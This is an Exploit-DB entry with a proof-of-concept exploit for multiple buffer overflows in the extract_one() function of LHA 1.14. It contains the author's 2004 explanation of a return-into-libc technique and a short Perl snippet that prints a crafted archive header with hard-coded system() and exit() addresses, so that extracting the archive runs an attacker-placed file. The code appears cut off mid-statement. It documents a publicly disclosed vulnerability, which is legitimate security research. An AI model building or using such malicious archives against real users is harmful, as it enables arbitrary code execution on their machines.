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exploitdbLukasz WojtowEDB-ID:24120
HistoryMay 19, 2004 - 12:00 a.m.

LHA 1.x - 'extract_one' Multiple Buffer Overflow Vulnerabilities

Lukasz Wojtow

AI Score




//LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in the 'extract_one()' and are due to a failure of the application to properly validate string lengths in offending files.
//These issues might allow an attacker to execute code in the context of a user invoking the affected utility.
//Exploiting lha-1.14 (after security advisories)
//19 May, 2004
//Copyright (2004) Lukasz Wojtow <[email protected]>
//At the time of writing this text, some vulnerabilities have been discovered
//and fixed, but not all (i've sent info to major linux distributions and 
//Bugtraq, but they didn't seem to bother).
//This code creates an archive, which decompressed with lha-1.14
//will cause a buffer overflow. The bug is in function extract_one (there are a 
//lot of bugs, actually). At first it looked like like a typical stack overflow,
//but after a couple of thoughts it was obvious that returnig on the stack was 
//impossible (due to special 0xff handling). The only option came to my mind 
//was return-into-libc.
//Addresses inside this code do system("/tmp/lhXXXXXX") and exit().
//Before exploiting 3 addresses have to be obtained:
//- system function,
//- exit function (not really needed, but SEGFAULT could be noticed),
//- address of /tmp/lhXXXXXX inside exploitet binary.
//Put these addresses into their place in the code (in little endian order 
//on x86) and run:
//./code > archive.lhz
//then command
//lha -e archive.lhz 
//will cause execution of /tmp/lhXXXXXX
//---CODE START---

my $exit_addr= "\x50\xf2\x4\x40";
my $system_addr= "\x30\x65\x6\x40";
my $tmp_string= "\xfa\x1e\x5\x8";

print   "\x19\x8d\x2d\x6c\x68\x64\x2d\x18\x0\x0\x0\x0\x0\x0\x0\xe1\xa5".
    $system_addr.  $exit_addr.  $tmp_string.

//---CODE END---

AI Score


